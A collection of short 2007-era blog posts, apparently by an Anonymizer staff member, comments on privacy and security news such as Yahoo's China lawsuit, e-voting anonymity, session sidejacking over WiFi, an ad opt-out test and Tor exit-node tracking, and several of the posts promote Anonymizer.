Yahoo seeks to dismiss China case - Yahoo! News

Yahoo seeks to dismiss China case - Yahoo! News This is a really interesting legal case. Yahoo was sued in the US by people representing some Chinese journalists who were convicted in China of violating Chinese law. Yahoo's involvement was to provide evidence from their logs and stored account data. The argument is that Yahoo should have resisted more and provided less information under US and International laws.

The people working for Yahoo in China are in a tough place because they could easily be arrested and held in contempt for failing to comply. Widespread corruption in China would almost certainly lead to extra-legal consequences for Yahoo if they resisted.

One might well criticize Yahoo for designing their systems in such a way as to be vulnerable to such foreseeable attempts to gather information on journalists and dissidents.

I think it is a mistake to trust such potentially damaging information to any company like Yahoo, Google, AOL, etc. International law will be a cold comfort if you are sitting in a jail somewhere. The only real solution is to take control of your own information. Use encryption, and anonymity to ensure that your information can not be handed over.

E-voting predicament: Not-so-secret ballots | CNET News.com

E-voting predicament: Not-so-secret ballots | CNET News.com Once again it is proved that security and anonymity are not as simple as they look. In this case an E-Voting system enables anyone to recover the actual votes of every voter, by name. This system eliminates any privacy in the voting process.

The implications for vote buying, and retribution by family, employers, and others, are huge.

The Trial of Fake Steve Jobs - how the anonymous author was identified

The Trial of Fake Steve Jobs - Bits - Technology - New York Times Blog Here is an interesting bit of detective work. An anonymous blogger was uncovered with a combination of geographic location (pulled from IP addresses), characteristic writing patterns, and some shrewd guess work. The tracking of the IP address is the first piece of evidence they mention. Now if he had used Anonymizer.......

Sidejacking

Report: "Sidejacking" session information over WiFi easy as pie

While this is not really news, it is a very nice description of a very widespread risk. This issue here is that many websites simply use a serial number in a cookie to keep track of user sessions. The implicit behavior is that if you have the cookie, you are authenticated and logged in. The big problem is that most of these sites are also insecure. With the popularity of insecure WiFi networks, capturing those cookies has become very easy. Once an attacker has the cookie, he can act as you for all purposes on those websites.

The simplest solutions are: enable SSL on the website (if possible), only use WPA secured WiFi, use a VPN, or use Anonymizer with the encrypted surfing option enabled (which effectively makes all websites SSL protected).

Testing if OPT-OUT really lets you OPT-OUT

I am posting this to help the World Privacy Forum test if web advertisers actually honor their own opt-out systems. This should provide some very interesting hard data on the actual activities of big on-line web advertisers. They are running a test on the Opt Out page of the Network Advertising Initiative site and are looking for volunteers. The idea is to determine how well the opt out page is working, for which systems and which browsers. 

Here are the directions:

(To run this test, you will need to set your browser to accept cookies)

1. Open site: http://www.networkadvertising.org/managing/opt_out.asp

2. Check all of the opt out boxes you will see on the right hand column of the screen.

3. Click the submit button. (bottom of page)

4. Note how many of the opt outs were successful. (Successful opt outs will have a green check mark next to them, unsuccessful opt-outs will have a red X mark next to them. 

5. Please tell us your OS and OS version, and your browser and browser version. 

6. If you can, please send us a screen shot of your result page. 

7. Please email results to nai_test@nyms.net  

8. We are closing the test period on Thursday, July 26, at close of business (Pacific). 

Tor hack proposed to catch criminals

Tor hack proposed to catch criminals This article is a couple of months old now, but I have been thinking about it a lot. Basically, HD Moore has created a set of tools to scan the contents of traffic leaving a TOR exit node, and to inject active tracking code into the data returned to the user. While this is possible in any anonymity system, the fact that almost anyone can run a TOR node makes the question of trust much more tricky.

I have talked to Roger Dingledine (one of the creators of TOR) about this but we seem to talk past each other. As I understand it, Roger feels that a user needs to take additional action to protect himself from such threats, including blocking all active content. He would further argue that if you are going to an insecure site, then you are putting yourself at risk. TOR is about anonymity, not security.

While all this is true, it runs aground on the reefs of reality. I am reminded of a statement by Yogi Berra: "In theory there is no difference between theory and practice. In practice there is." People want active content. People want to go to insecure websites. People want privacy. People don't want to work for it.

At the end of the day, that is really the difference between the TOR philosophy and the Anonymizer philosophy. We think that users should not need to be security experts. We think they should not have to research the trustworthiness of a number different individuals or groups. We think that the privacy threats normal people actually face in the real world are a long way from the unlimited money and resource attacks imagined by academic security researchers. Security is a balance. We strive to be secure, fast, and user friendly. I think 11 years with out a single breach of a user's identity from using the service is good evidence that we are doing something right.

April 2, 2007 - Fortify Software Documents Pervasive and Critical Vulnerability in Web 2.0

April 2, 2007 - Fortify Software Documents Pervasive and Critical Vulnerability in Web 2.0 It looks like, in addition to the privacy risks of voluntarily revealing information through Web 2.0 sites, weaknesses in the most common frameworks will enable malicious attackers to gather even non-public data from these sites.

Web 2.0 generally refers to web sites that are either web applications or are based on community content. In either case they involve the users uploading substantial amounts of possible sensitive personal information to the sites. I predict that a great deal of damage may result from this in the long run.